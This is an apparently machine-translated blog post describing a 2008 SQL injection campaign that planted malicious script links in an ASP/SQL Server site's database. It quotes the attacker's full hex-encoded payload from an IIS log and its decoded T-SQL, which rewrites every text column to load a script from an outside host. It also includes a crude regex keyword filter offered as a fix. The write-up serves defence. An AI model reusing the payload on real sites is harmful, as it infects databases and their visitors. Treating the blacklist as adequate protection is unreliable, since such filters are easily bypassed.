Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall
some time ago, the company a major web site database of individual tables of data are often modified and hung horse, because the site was previously done by others, code a little messy, so only to see the relevant file code with these tables. The reason may be to receive the parameters of the time does not filter the dangerous characters, and then add the parameters to accept the Format function, the database connection file in the acceptance of the parameters appear ";" Replaced with ";" But after a day, the horse was hung, and the semicolon substitution did not work.
then searched, and found that from March onwards a lot of database Sql injection Hanging horse example, it seems this time this means of horse is popular, and only for Asp+sql server website, only your site code exists SQL injection loophole, you may be hanged horse, And only for text-type fields char/text similar fields, after the modified data are basically js,1.js,b.js, and the Web site often changed.
helpless, can only find the way to prevent SQL injection, online search to the following code, add the code to the database connection file:
<%
Response.Buffer = True
Const enablestopinjection = True
If enablestopinjection = True Then
If request.querystring <> "" Then call Stopinjection (request.querystring)
If request.cookies <> "" Then call Stopinjection (request.cookies)
If request.form <> "" Then call Stopinjection (Request.Form)
End If
Sub stopinjection (Values)
Dim regEx
Set regEx = New RegExp
regex.ignorecase = True
Regex.global = True
Regex.pattern = "' |;| #| ([\s\b+ ()]+ (select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add| set|open|close|use|begin|retun|as|go|exists) [\s\b+]*) "
Dim Sitem, svalue
for each sitem in Values
svalue = Values (sitem)
If regex.test (svalue) Then
Response.Write "SQL injection risk detected, please confirm the information you submitted." "
Response.End
End If
Next
Set regEx = Nothing
End Sub
%>
Note: The values in the Regex.pattern are set according to your needs, such as improper settings, then the general submitted information will also prompt for SQL injection.
added this code has never been injected into the phenomenon of horse.
a few days ago, from the space business to IIS log, to see the log was found by SQL injection of specific URLs and methods, as follows:
2008-06-23 16:01:31 get/xxx.asp Id=90;declare%20@s%20varchar (4000); Set%20@s=cast ( 0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7 220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e 73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e7874797 0653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f7220464554434820 4e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d30292042454 7494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e56455254285641524348415228 34303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f7777772e616477626e722e636f6d2f622e6a733e3c2f7 363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736 F7220%20as%20varchar (4000)); EXEC (@S);---201.8.166.17 mozilla/4.0+ (compatible;+msie+7.0;+windows+nt+5.1;+.net+clr+2.0.50727)-www.xxx.com 200 0 271 1432 406
in the middle of the code after the decryption is:
DECLARE @T varchar (255),
@c varchar (255)
DECLARE table_cursor Cursor for
Select
A.name,b.name
from sysobjects A,
syscolumns b
where A.id=b.id and
a.xtype= ' u ' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN table_cursor
FETCH NEXT from table_cursor into @t,@c
while (@ @FETCH_STATUS =0)
BEGIN
exec (' Update [' +@t+ '] set [' +@c+ ']=
RTrim (CONVERT (varchar,[' +@c+ ')) +
"Hang Horse content")
FETCH NEXT from table_cursor into @t,@c
End
Close Table_cursor
deallocate table_cursor
and, this SQL injection every few minutes, and constantly changing the IP, simply can not find its real source, it is obvious how despicable such people.
If the Web site IIS log is larger, you can consider the "IIS Web Log Import Analysis tool" written Chxwei a few days ago to help you query the analysis.
finally concludes that if the database database is modified and hangs the horse:
1, first look at the IIS log, what is the injected page, and then modify the code of those pages to prevent SQL injection.
2, if you don't have an IIS log and you can't find the pages you're using, use the above code in the database connection file.
appear SQL injection, there must be a loophole in the site code, so code normalization is the focus.
Source: http://www.chxwei.com/article.asp?id=359
